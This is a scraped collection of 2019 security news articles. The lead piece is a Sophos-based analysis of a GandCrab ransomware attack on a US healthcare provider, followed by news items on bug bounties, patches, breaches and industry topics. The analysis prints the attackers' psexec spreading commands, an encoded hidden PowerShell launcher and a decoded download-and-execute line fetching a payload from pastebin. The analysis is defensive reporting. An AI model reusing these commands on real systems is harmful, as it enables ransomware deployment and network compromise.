STE WILLIAMS

Inside a GandCrab targeted ransomware attack on a hospital

Thanks to Sophos experts Vikas Singh and Peter Mackenzie for the research in this article.

Just before 9pm on Sunday, 3 February 2019, a GandCrab executable sparked into life for an instant, before its brief existence was snuffed out by antivirus software. Stopped in its tracks, the malware triggered the first of what would quickly become hundreds of separate alerts for a US healthcare provider in the grip of a targeted ransomware attack.

The organisation’s network of about 500 computers found itself fending off two attacks involving GandCrab ransomware. Because some of the computers on the network weren’t protected by antivirus, the attack provides an unusually colourful illustration of both how a targeted ransomware attack happens, and how different layers of protection interact in defence.

This is how the attack unfolded and how you can stop it happening to you.

Approach

Ransomware is malware that encrypts the contents of a computer and then demands a ransom in return for decrypting it. Ransomware is normally distributed in large scale, untargeted attacks that use malicious websites or email attachments to infect as many victims as possible. Victims are typically asked to pay a few hundred dollars’ worth of Bitcoin to free themselves from the ransomware’s grip.

One of the most popular kinds of ransomware used in these campaigns is GandCrab. Its creators peddle it to anyone who wants to use it using the Ransomware-as-a-Service model, which nets them a percentage of each ransom it extorts. GandCrab users choose the ransom they want to demand, which is typically somewhere from a few hundred to a few thousand dollars per computer.

But in the last couple of years, a new template for ransomware attacks has emerged.

Some criminals are turning away from “fire and forget” distribution in favour of highly focused, guided attacks, generally referred to as targeted attacks.

In a targeted attack the ransomware operators choose a victim, break into their network and deploy their ransomware to maximum effect. Typically that means targeting an organisation’s servers, although occasionally, as in this case, an attacker will simply target as many computers as possible.

Delivering the malware to its destination by hand allows hackers to adapt: they can perform reconnaissance, carry out their work using standard system administration tools, learn from their mistakes, respond to defences and, if they aren’t removed from the network, they can persist until they find an approach that works.

The effect of this approach is to turn entire organisations into victims rather than simply individual users, and the pay-off for the extra effort involved in performing this kind of attack is often huge five or six figure ransoms.

Targeted ransomware attacks have typically been associated with particular strains of specialised malware, like BitPaymer, SamSam or Ryuk. RaaS like GandCrab allows crooks with less technical ability to get in on the act without needing to create their own ransomware, command and control infrastructure or payment handling.

Ingress

Modern targeted attacks almost always begin with an attacker entering a victim’s network by brute-forcing the credentials of a computer with RDP (Remote Desktop Protocol) enabled. That appears to be how the hackers entered here. Despite the organisation’s attempts to limit RDP access to specific IP ranges and third parties, computers with open RDP ports were visible in the Shodan search engine results where attackers often look for victims.

Stronger passwords or two-factor authentication would likely have stopped the attack, while disabling RDP or limiting it to users on the company VPN (Virtual Private Network) would have removed the organisation from the attacker’s shortlist of targets entirely.

The attackers either succeeded in guessing an administrator password from outside the network, or acquired administrator access after breaking in.

Although they weren’t found in this attack, the same group has been linked to other attacks that relied on the RDP password cracking tool NLBrute, and Mimikatz, a tool that allows attackers to elevate their privileges after breaking in by extracting admin passwords from memory.

The attackers either entered via, or moved laterally to, a computer acting as a host for multiple virtual machines running services vital to the organisation. Critically, although much of the network was protected by Sophos Endpoint Protection, the organisation had chosen not to install it on this computer, which made it the perfect place for the attackers to hide, prepare and then launch their attack.

Reconnaissance

Hidden from view, the attackers unloaded their toolkit into the C:PerfLogsApps directory. They scanned the victim’s network using two tools – KPortScan3.exe and NetworkShare.exe – and compiled a list of the IP addresses they’d attempt to infect with GandCrab.

Had the server been running endpoint security software, it’s likely that both of these utilities would have triggered an alert and been blocked (the Sophos software running elsewhere on the network blocks them both as Potentially Unwanted Applications).

Alongside their reconnaissance tools, the crooks also readied a number of batch scripts and a copy of GandCrab 5.1 renamed Adobe Acrobat.exe.

First wave

Having scanned the network, the attackers launch their attack using psexec EXE.bat, a small batch scripts that uses the PsExec utility to copy GandCrab, under the name Adobe Acrobat.exe, to each IP address in the file ip.txt.

GandCrab targeted attack, first wave

 psexec @ip.txt -d -c "Adobe Acrobat.exe" 

PsExec is part of Microsoft Sysinternals and Microsoft describes it as:

…a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software.

System administrators use it to distribute and run software throughout a network, which makes it the perfect tool for hackers looking to spread ransomware. (For that reason, Sophos treats PsExec as a Potentially Unwanted Application and blocks it by default. Admins are free to unblock it but encouraged to do so selectively, for the smallest number of useful users.)

For convenience, it’s not unusual for admins to remove PsExec from the list of PUAs entirely, and that’s what the administrators on the victim’s network had done here.

Had it remained on the list of PUAs, an alert would have been triggered and the attacker would have been unable to copy the malware from the unprotected machine onto its targets.

The GandCrab executables had been modified to avoid static, signature-based detection but were detected by behavioural monitoring as soon as they began to run. (Sophos’s behavioural monitoring blocked them as HPmal/GandKrb-A, and static detection has since been added to Troj/Gandcra-AH.)

Behavioural monitoring had been turned off on some servers, and on those computers the executables were stopped by Intercept X‘s CryptoGuard, which detected the malware’s attempts to encrypt files.

The same anti-encryption defence also stepped in to protect data on computers that shared network drives with unprotected systems. The malware executables lurking in the memory of unprotected computers were hidden from security software, but when they tried to encrypt files on drives shared by protected computers the encryption was stopped and the offending systems isolated.

Because some activity has to occur for both behavioural detection and anti-encryption countermeasures to fire, the malware was able to drop some ransom notes.

This gave the victim an opportunity to investigate how much ransom they would have been charged, and to dip their toe into the disconcertingly polished world of the GandCrab RaaS environment.

The ransom note directed the victim to a page on the GandCrab Dark Web site http://gandcrabmfe6mnef.onion/unique code (note the unusual vanity domain) where they could identify themselves with a ransom note.

The demand? A staggering $18,750 per machine, doubling after six days. Far more than the typical ransom in a an untargated spam campaign.

GandCrab Dark Web site

Second wave

About ten minutes after the first wave of attacks ran aground, a second GandCrab attack using an interesting Reflective PE Injection technique began. It was launched by another batch script relying on PsExec, called psexec BAT.bat which copied the backup.bat script to all the computers listed in ip.txt before invoking it.

GandCrab targeted attack, second wave


psexec @ip.txt -d -c backup.bat

The backup.bat script starts PowerShell and invokes some base64-encoded code.


cmd.exe /c START C:Windows system32WindowsPowerShellv1.0powershell.exe -nop -w hidden -e SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEMASABJAFQARQBDAFQAVQBSAEUAIAAtAGMAbwBuAHQAYQBpAG4AcwAgACcAQQBNAEQANgA0ACcAKQB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgAkAEUAbgB2ADoAVwBJAE4ARABJAFIAXABTAHkAcwBXAE8AVwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAIAAtAGEAcgBnAHUAbQBlAG4AdAAgACIASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBGADIAaQB5AFcAWQBLAFoAJwApACkAOwBJAG4AdgBvAGsAZQAtAEsASwBMAFQARwBIAE8AWgBBAEIAWABTAEsAVQBLAEwAQwBWAFQAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAMAAwADAAMAAwADsAIgB9AGUAbABzAGUAewAgAEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8ARgAyAGkAeQBXAFkASwBaACcAKQApADsASQBuAHYAbwBrAGUALQBLAEsATABUAEcASABPAFoAQQBCAFgAUwBLAFUASwBMAEMAVgBUADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAMAAwADAAMAA7ACAAfQA

The code invokes a webclient object which downloads code from a page on pastebin.com, and then calls the function Invoke-KKLTGHOZABXSKUKLCVT in that code, with a delay of 1 million seconds (about 11.5 days).

If ($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64') {
    Start-Process -FilePath "$Env:[email protected]" -argument "IEX ((new-object net.webclient).downloadstring('https://pastebin.com/raw/F2iyWYKZ'));Invoke-KKLTGHOZABXSKUKLCVT;Start-Sleep -s 1000000;"
} else {
    IEX(({new-object net.webclient).downloadstring('https://pastebin.com/raw/F2iyWYKZ'));Invoke-KKLTGHOZABXSKUKLCVT;Start-Sleep -s 1000000;
}

The function scheduled to run in 1 million seconds’ time contains a full, base64 encoded copy of the GandCrab malware, which is loaded directly into memory by PowerShell. This technique is an attempt to dodge antivirus software by using a legitimate executable, PowerShell, and avoiding filesystem writes.


function Invoke-KKLTGHOZABXSKUKLCVT
{
    $PEBytes32 = amp;lt;base64 encoded GandCrab binaryamp;gt;

    [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)
    Invoke-Inj -PEBytes $PEBytes
}

It didn’t work – the paused copies of GandCrab in memory were caught by behavioural protection and identified as HPmal/Ransom-Z again. Static detection has since been added for backup.bat, which is detected as Troj/BatDldr-Z.

Reflective PE Injection is a fileless malware technique that’s been around a while, but the earliest information we’ve found that shows GandCrab being invoked in this way, with a million second delay, was published in February 2018.

In that case the code was triggered by a Word Macro in a document downloaded by a PDF, delivered in a spam campaign. Sophos has since seen the code used in a small number of targeted ransomware attacks, beginning in December 2018.

The delay of 1 million seconds is curious. It makes sense that the attacker might try two different approaches since it increases their chances of success. But why not run them concurrently and reduce the time the victim has to respond?

We don’t know why the second wave was set to go off with such a delay, but we can speculate. If both waves of the attack had succeeded then the victim would have been struck twice, with two ransom demands, a little under two weeks apart. The hiatus between them is perhaps just long enough to allow the victim to pay the ransom and recover from the first attack, but not enough time to make significant changes to their computer administration.

What to do?

Defending against a determined, targeted attack demands defence in depth, and, as in many things, prevention is better than cure. That starts with ensuring that access to RDP is secure and finishes with regular, comprehensive, off-site backups, with much else in between.

To read more about those things and the preventive steps you can take to protect yourself against targeted ransomware of all stripes, read our article on how to defend against SamSam ransomware.

Visit sophos.com to read more about PUAs (Potentially Unwanted Applications), behavioural detection, CryptoGuard and other anti-ransomware technologies mentioned in this article.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/WCLrf2Oh7nE/

Bad news for WannaCry slayer Marcus Hutchins: Judge rules being young, hungover, and in a strange land doesn’t obviate evidence

Marcus Hutchins, the Brit white-hat hacker who halted 2017’s WannaCry ransomware outbreak, has failed to stop the American legal system using statements he made while recovering from the effects of holidaying in Las Vegas.

Hutchins, aka MalwareTechBlog, faces a criminal trial in the US over allegations he wrote parts of the Kronos online banking trojan in 2014. He denies this. The professional malware researcher was arrested in early August 2017 as he tried to fly home to England from the Def Con hacker conference in Nevada.

Def Con takes place in Las Vegas, and when you’re a young bloke living it large abroad, the notorious Sin City has much to offer.

“Hutchins had spent much of the week partying, which included ingesting various intoxicating substances,” federal district judge Joseph Stadtmueller noted this week (PDF) in response to Hutchins’ motion to get statements he made thrown out. Hutchins’ argument, in brief, was that after a week spent partying in Vegas he was tired, hungover, and generally in no fit state to cope with the legal system of a foreign country.

As the judge put it: “Hutchins argues that there is insufficient evidence that he received notice of his Miranda rights. This argument is a non-starter, in part because Hutchins acknowledges that he was read his rights.” The Brit was also said to be “alert, engaged, coordinated and coherent.”

As previously reported, while talking to an unnamed associate over a recorded prison telephone line, Hutchins appeared to admit to creating software nasties, at one point saying: “I used to write malware, they picked me up on some old shit,” later adding: “I wrote code for a guy a while back who then incorporated it into a banking malware.”

In his ruling, Judge Stadtmueller found that FBI Special Agents Lee Chartier and Jamie Butcher had been following Hutchins from the morning of the day he was arrested, having grabbed him at Las Vegas airport before he had a chance to get into the airport’s bars.

The two g-men swore on oath that they had read Hutchins his rights before questioning him, though the judge also found that they did not show him the arrest warrant “until over an hour into the interrogation”, noting that Chartier claimed he showed Hutchins the warrant immediately even though the recording of the interview showed this was untrue.

“A terrible hangover alone does not, as a matter of law, render someone unable to exercise or waive their Miranda rights,” continued Judge Stadtmueller.

Hutchins

Lawyers for Marcus Hutchins: His ‘I made malware’ jail phone call isn’t proper evidence

READ MORE

Hutchins appears to have dug himself a hole by confusing the American Miranda rights statement (“You have the right to remain silent; anything you say can and will be used against you in a court of law”) with the British criminal caution (“You do not have to say anything. But it may harm your defence if you do not mention when questioned something which you later rely on in Court. Anything you do say may be given in evidence”).

Because the UK has no legal right of silence when under state interrogation, Hutchins believed his best tactic was to answer the FBI agents’ questions in full in the belief they’d let him go, instead of shutting up and getting a lawyer.

Though Judge Stadtmueller was sympathetic about Hutchins’ confusion over these fine legal details, that sympathy didn’t go very far: “In light of Hutchins’ mental acuity, the Court cannot find that his waiver [of his Miranda rights, by answering the FBI’s questions] was unintelligent.”

The court also threw out Hutchins’ attempt to have a fresh set of charges dismissed that were brought against him in June 2018, ruling that the second indictment was legally valid. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/02/14/marcus_hutchins_evidence/

Diversity Is Vital to Advance Security

Meet five female security experts who are helping to propel our industry forward.

Who can forget the backlash to last year’s RSA Conference, at which only one woman was on its lineup of speakers? As a result, organizers are keeping a particularly close eye on diversity, and all-male panels have been banned.

Let me be clear: The issue of finding an equal number of female speakers or diversifying the industry isn’t a numbers game. Rather, it’s critical to the expansion, growth, and sophistication of our industry and trade.

Diversity isn’t just different appearances or labels. It’s beyond that. It’s about diversity of thought, the differences in our problem-solving processes and perspectives — and it is a critical component of true innovation.

Some have argued that since women make up 20% of the cybersecurity workforce, it’s difficult to find qualified speakers among them in the first place. It is important to acknowledge this massive gender gap in cybersecurity, along with a massive skills gap, too. Perhaps solving one can help solve the other. It starts with highlighting the minority and female professionals and leaders who are working today to move our industry further.

There are plenty of highly qualified individuals to choose from. Below, I’ve curated a list of highly qualified women who I think make any excuse for inequity obsolete. These are the women who are writing and talking about the issues that are important, and who have real, tangible impact. I’ve also seen three of them speak last year at the OurSA security conference and have been following their views since.

Maria Cirino
Co-Founder and Managing Partner, 406 Ventures
Former cybersecurity CEO-turned-venture-capitalist, Maria is widely successful and well-known in the infosec industry. Her 25-plus years of experience in building and starting technology companies includes Massachusetts IPOs of the Year and the founding of two successful companies and a venture capital firm.

Eva Galperin
Director of Cybersecurity, Electronic Frontier Foundation
Eva is primarily focused on providing privacy and security for vulnerable populations around the world. In a technology ecosystem not necessarily designed for them, she helps educate these communities through her political science and technical background.

Jennifer Granick  
Surveillance and Cybersecurity Counsel, ACLU
Jennifer works with the ACLU Speech, Privacy, and Technology Project. She litigates, speaks, and writes about privacy, security, technology, and constitutional rights. As an acclaimed author and expert in law, Jennifer fights for civil liberties in an age of massive surveillance and digital technology. She can answer the question of what a culture of government surveillance actually has to do to society and our rights, and how it is portrayed in the world, and the ethical implications.  

Anna Lauren Hoffman
Writer, Researcher, Educator at The Information School at the University of Washington
Anna specializes in issues that impact real people in the intersection of data, technology, culture, and ethics. She pays particular attention to the ways discourse, design, and uses of information technology work to promote or hinder the pursuit of important values (think: respect and justice).

Cathy O’Neil
Author  
Cathy is the author of “Weapons of Math Destruction: How Big Data Increases Inequality and Threatens Democracy.” She’s a mathematician-turned-quantitative-analyst-turned-data-scientist who has given TED talks and is an established expert in her field. Her book has been a New York Times bestseller and long-listed for the National Book Award.

We are in a unique position to improve and mature our industry. This change should be embraced as an opportunity to focus on diversifying our security thought leaders and listening to their experiences and points of view as they propel us forward. Our world is rapidly evolving. Threats are more becoming sophisticated, and the work is never-ending. Together — with an environment of inclusivity and collaboration — we can combat them. 

Related Content:

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

As CISO, Joan is responsible for the holistic security and compliance of Auth0’s platform, products, and corporate environment. She brings 20 years of experience to the role, with a career that has spanned a wide variety of industries, including healthcare, manufacturing, … View Full Bio

Article source: https://www.darkreading.com/careers-and-people/diversity-is-vital-to-advance-security/a/d-id/1333818?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Coffee Meets Bagel Confirms Hack on Valentine’s Day

The dating app says users’ account data may have been obtained by an unauthorized party.

Just in time for Valentine’s Day, dating app Coffee Meets Bagel today alerted account holders to a data breach, stating an unauthorized user may have accessed their information.

This incident was discovered as part of a larger pool of user data on sale for less than $22,000 in Bitcoin on the Dark Web, The Register reports. In total, the data dump includes 617 million account details stolen from 16 hacked websites, including Dubsmash (162 million), MyFitnessPal (151 million), MyHeritage (92 million), ShareThis (41 million), HauteLook (28 million), and Animoto (25 million).

The Register report alleges 6.17 million Coffee Meets Bagel accounts (673 MB of data) were taken between late 2017 and mid-2018. Each account record reportedly contains a full name, email address, age, registration date, and gender. However, in its disclosure of the incident, Coffee Meets Bagel reports affected data is limited to names and email addresses prior to May 2018. The app emphasizes it does not store any financial information or passwords.

Coffee Meets Bagel learned of the incident on Feb. 11, 2019, and has since hired forensic security experts to review its systems and infrastructure, according to an email to users. It has begun to audit vendor and external systems and will continue to monitor for suspicious activity.

This isn’t the only security incident affecting dating platforms this Valentine’s Day. A separate TechCrunch report detailed several account takeover incidents affecting users of OkCupid.

Read more details about Coffee Meets Bagel and related larger incidents here.

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/coffee-meets-bagel-confirms-hack-on-valentines-day/d/d-id/1333881?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

New Professional Development Institute Aims to Combat Cybersecurity Skills Shortage

The (ISC)2 announces a new institute for working cybersecurity professionals to continue their education.

(ISC)2 has announced the founding of a Professional Development Institute (PDI) to address the ongoing deficit in trained cybersecurity professionals for the IT industry. PDI will provide a free portfolio of courses to (ISC)2 members for their continuing professional education, as well as to nonmembers and the general public for a fee .

Courses will cover staying in compliance with the European Union’s Global Data Protection Regulation, achieving DevSecOps, and building a strong security culture.

According to the announcement, PDI will mean the addition of 18 staff members to (ISC)2 and a new video production studio, to be built in Clearwater, Fla., for the creation of course content.

Read more here.

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/careers-and-people/new-professional-development-institute-aims-to-combat-cybersecurity-skills-shortage/d/d-id/1333882?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Valentine’s Emails Laced with Gandcrab Ransomware

In the weeks leading up to Valentine’s Day 2019, researchers notice a new form of Gandcrab appearing in romance-themed emails.

Hackers love the holidays, and Valentine’s Day is no exception. Some cybercriminals currently are spreading the love, with a new form of Gandcrab ransomware sliding into target inboxes.

In the weeks preceding February 14, Mimecast researchers noticed cyberattackers and threat groups previously linked to Gandcrab were using the holiday to trick victims into opening malicious emails. Like Christmas, Valentine’s Day is a time when people buy presents for loved ones – and the shopping period gives attackers a wider window of opportunity to strike.

There are several ways they exploit people celebrating Valentine’s Day. Virtual greeting cards, and fraudulent emails offering gifts and flowers, can lure victims into downloading malicious attachments or clicking bad links. Fake surveys, malicious dating apps, and hacked (but legitimate) dating apps and websites, can be used to collect personal and financial information.

“Threat actors will typically leverage holidays throughout the year (tax season, the holidays, etc.) as a way to lure people in with something familiar, so it’s no surprise that these romance-themed campaigns are flourishing around this time,” Mimecast Threat Labs explains.

Now, Gandcrab is spreading via emails with malicious attachments – one of its most popular vectors. Researchers identified emails delivering the same version of Gandcrab with different subject lines related to romance: “This is my love letter to you,” for example, or “Wrote my thoughts down about you.” Attached is a zip file with a name similar to Love_You_2018, plus a few random digits. Executing the file downloads and launches the ransomware.

Infected victims will see a ransom note on their desktop. The note contains a link; if clicked, it asks the user to authenticate by uploading a file created by the malware. Language options offered include English, Korean, and Chinese, could shed light on the victim pool, researchers report.

Submitting the file will bring victims to a page where attackers demand ransom in exchange for their files’ safe return. This campaign wants $2,500 per victim within seven days of the attack. The attackers try to make it easy for their targets, talking them through the steps to make a payment, which researchers explain is likely to increase profits from vulnerable victims.

Gandcrab, New and Old

Gandcrab is only a year old but made a big splash in 2018, infecting more than 50,000 victims and generating at least $600,000 for attackers in the first two months. In March, Gandcrab underwent agile development; in May, campaigns distributed the ransomware via legitimate but poorly secured sites. It was recently seen disguised as a graphic in a Super Mario game.

Its operators have continued to adjust Gandcrab over time; adding new features, improving efficiency, and identifying and eliminating bugs. Several versions of Gandcrab were released throughout the past year; version 5.1.6, the most recent, was spotted on Feb. 13, 2019.

This particular Valentine’s campaign uses Gandcrab version 5.1.0. Like earlier versions, it encrypts victims’ files and changes their file extensions. Victims will notice a text file with the ransom note appear toward the top of their desktop screen; each text file contains a URL with a unique token, which operators use to identify and track each victim of the campaign.

In general, there are a few features that set Gandcrab apart from other ransomware variants. It specifically identifies and avoids Russian victims: if a Russian keyboard is detected, the attack is terminated. Gandcrab also tailors ransom notes to its victims, suggesting a targeted threat. Finally, it uses DASH cryptocurrency to faster, more secure transactions, Mimecast reports.

Gandcrab has also been transformed into a ransomware-as-a-service (RaaS) threat; as a result, some campaigns are linked to the ransomware itself but not necessarily the group developing it. Mimecast found the actors behind Gandcrab have several versions for sale at different prices.

The Valentine’s Gandcrab campaign is one of many threats spreading through cyberspace this time of year. US-CERT this week published a warning to consumers, detailing the online scams found in dating websites and chat services. Most of these are highly targeted social engineering attacks informed by personal information found in dating profiles and social media accounts.

Related Content:

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/valentines-emails-laced-with-gandcrab-ransomware/d/d-id/1333883?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Toyota Prepping ‘PASTA’ for its GitHub Debut

Carmaker’s open source car-hacking tool platform soon will be available to the research community.

The lead developer behind Toyota’s new cybersecurity testing tool said the carmaker plans to make its so-called PASTA (Portable Automotive Security Testbed) available via GitHub as early as next month or April.

Tsuyoshi Toyama, senior researcher at Toyota InfoTechnology Center, told Dark Reading that he and his team are currently working on getting the PASTA specifications ready for availability online, and plan to offer as open-source the platform’s specs, CAN (controller area network) ID maps, ECU (engine control unit) program codes, and ECU circuit diagrams for vehicle testing. He says Toyota also hopes to offer PASTA’s driving simulator programs as open source, as well.

PASTA is an open-source testing platform for researchers and budding car hackers. Toyota’s Toyama and colleague Takuya Yoshida first revealed and demonstrated PASTA in December at Black Hat Europe in London. The open source tool represents a major shift for automakers, which traditionally have rejected or ignored vulnerability research on cybersecurity weaknesses in modern vehicles.

Toyota’s demonstration of the car-hacking tool and announcement that it would open-source the specs were widely welcomed by the security research community, which long has relied on researchers with little to no car engineering knowledge tinkering with the communications and software elements of vehicles to root out security flaws.

But unlike the renowned live, moving-car hacking research conducted by Charlie Miller and Chris Valasek, Toyota’s PASTA tool is for simulated car hacking. The platform simulates the remote operation of a vehicle’s wheels, brakes, windows, and other features to let researchers learn more about the electronic communications features and find vulnerabilities and test exploits.

The 8kg and portable tool built by Toyota resides in a steel attaché case, and the carmaker plans to also sell it as a hardware and software platform, initially in Japan. It contains four ECUs, ODBII and RS232C ports, as well as a port for debugging or binary hacking, and features LED control panels that the user can set to run tests or exploits. “It’s small and portable so users can study, research, and hack with it anywhere,” Toyama explained during the PASTA demonstration at Black Hat Europe.

PASTA also can be used by automakers in RD to test how certain features added to real vehicles could affect the security of the vehicle, for example. “PASTA could also be used for educators” teaching car security, Toyama said.

Toyama and his colleague Takuya Yoshida, principal researcher with Toyota InfoTechnology Center, will demonstrate PASTA next month at Black Hat Asia in Singapore.

Related Content:

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/toyota-prepping-pasta-for-its-github-debut/d/d-id/1333886?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Update now! Microsoft and Adobe’s February 2019 Patch Tuesday is here

Internet Explorer (IE) may have launched way back in 1995 but nearly a quarter of a century later it’s still creating work for Microsoft and Windows users.

Take February’s Patch Tuesday, a highlight of which is a bona fide IE 10 and 11 zero-day said by Microsoft to be under active exploit by cybercriminals.

Identified as CVE-2019-0676 and marked ‘important’, all patchers have to go on for now is Microsoft’s brief description of what an exploit might look like:

An attacker who successfully exploited this vulnerability could test for the presence of files on disk. For an attack to be successful, an attacker must persuade a user to open a malicious website.

That’s not just for IE holdouts either – IE11 is present within all consumer Windows 10 versions for compatibility reasons so all users in this category get it.

Rounding out the legacy IE patching is the critical flaw identified as CVE-2019-0606, a Remote Code Exploit (RCE) vulnerability exploitable by luring a user to a malicious website.

Among its haul of 77 CVE-level security fixes, 20 marked critical, February has four other important-rated flaws that have been publicly disclosed: CVE-2019-0636, CVE-2019-0646, CVE-2019-0647, and the most interesting of all, CVE-2019-0686.

Covered last week by Naked Security, this is the recently-revealed Exchange elevation of privilege flaw dubbed PrivExchange which an attacker could use as part of a chain to elevate an ordinary mailbox account into that of Domain Admin.

Critical flaws

Among the undisclosed criticals is CVE-2019-0626, an RCE in DHCP through which an attacker might take over the server by sending a specially-crafted packet.

Then there’s the pair of critical flaws in SharePoint, CVE-2019-0594 and CVE-2019-0604, both of which would allow an attacker to “run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.”

Two marked important are CVE-2019-0630 and CVE-2019-0633, both RCE flaws in SMBv2 that would allow an attacker to take over a targeted machine. All that stands between these being critical flaws is that attackers would still have to find a way around authentication.

For Windows 10 version 1809, look for build 17763.316 (KB4487044) in Windows Update.

For 1709: https://support.microsoft.com/en-us/help/4486996/windows-10-update-kb4486996

For 1703: https://support.microsoft.com/en-us/help/4487020/windows-10-update-kb4487020

For 1607: https://support.microsoft.com/en-us/help/4487026/windows-10-update-kb4487026

Adobe flaws

This month’s Adobe menu features 75 CVE-level vulnerabilities, all but four of which relate to the different versions of Acrobat/Reader. Of these, 43 are rated ‘critical’.

One already in the public domain is CVE 2019-7089, a Reader flaw discussed in detail by Naked Security that would allow an attacker to exploit the execution of a malicious PDF to steal NTLM hash passwords via an SMB request.

Resembling last April’s CVE-2018-4993 flaw in some respects, there are now two patches for this after guerrilla patching initiative 0patch released an independent fix in advance of Adobe’s, on 12 February.

Updating takes users to 2019.010.20091 for Acrobat/Reader DC, 2017.011.30120 for Acrobat/Reader DC 2017, and 2015.006.30475 for Acrobat/Reader DC 2015.

Adobe does serve one welcome surprise – only ONE fix for Flash, CVE-2019-7090.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/fvfmL7KGjQQ/

Google paid out $3.4m in bug bounties last year

A 19-year-old researcher from Uruguay; a restaurant owner from Cluj, Romania; and a Cambridge professor: these are just three of the 317 researchers who were rewarded for reporting vulnerabilities and helping keep Google users safer in 2018, the company said in its yearly bug bounty payout wrap-up.

Google awarded a total of $3.4 million (£2,639,522), in 1,319 individual rewards, to those researchers. The company says that the researchers hail from 78 countries. The biggest award was $41,000, while $181,000 was donated to charity.

The Google Vulnerability Reward Program (VRP) was launched in 2010 to reward researchers who uncovered bugs in Chrome and other Google products. Since then, it’s paid out more than $15 million.

In 2015, Google launched a bug bounty program for Android, its mobile operating system.

Last year, $1.7 million went to bug hunters who found problems in Android or in Google’s Chrome browser.

Thank you, Ezequiel, Tomasz, Dzmitry, et al.

Out of the 317 researchers who won bug bounties last year, Google gave a little bit of back story for these three:

Ezequiel Pereira. The 19-year-old researcher from Uruguay uncovered a Remote Code Execution (RCE) bug that allowed him to gain remote access to the Google Cloud Platform console. In May, CNBC reported that this was actually Pereira’s fifth accepted bug, but at $36,000, it was by far his most lucrative.

Tomasz Bojarski from Poland discovered a bug related to Cross-site scripting (XSS). XSS attacks allow attackers to inject malicious code into websites, enabling them to change the behavior or appearance of a website, to steal private data or to perform actions on behalf of someone else. Google says that Tomasz was last year’s top bug hunter and that he used his reward money to open a lodge and restaurant.

Dzmitry Lukyanenka, a researcher from Minsk, Belarus. Google says that after he lost his job, Dzmitry began bug-hunting full-time and became part of its VRP grants program, which provides financial support for prolific bug-hunters over time.

Security and privacy funding goes to academia

Google says it’s also working with academia on specific research projects. It pointed to a project from 2017 in which Google researchers teamed up with those from the CWI Institute in Amsterdam to create a collision in the cryptographic hash function SHA1. A collision occurs when two distinct pieces of data hash to the same digest – something that should never happen and which underscored the need to sunset SHA1.

“Academic breakthroughs help improve data privacy and security for years to come,” Google says. That’s why, in November 2018, it announced the Security and Privacy research awards. They’re a way to recognize academics who’ve made major contributions to the field, Google said.

These are the winners, on whose behalf Google has donated more than half a million dollars to their universities:

  • Alina Oprea, Northeastern University: Cloud security
  • Matthew Green, Johns Hopkins: Cryptography
  • Thorsten Holz, Ruhr-Universität Bochum: Systems security
  • Alastair Beresford, Cambridge: Usable security and privacy, mobile security
  • Carmela Troncoso, Ecole Polytechnique Fédérale de Lausanne: Privacy / security machine learning
  • Rick Wash, Michigan State University: Usable privacy and security
  • Prateek Saxena, National University of Singapore: Machine learning / web security

Congratulations to all the reward recipients. Good luck with your future bug hunts!

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/QALO_3BvNyw/

Apple App Store stuffed with hardcore porn and gambling apps

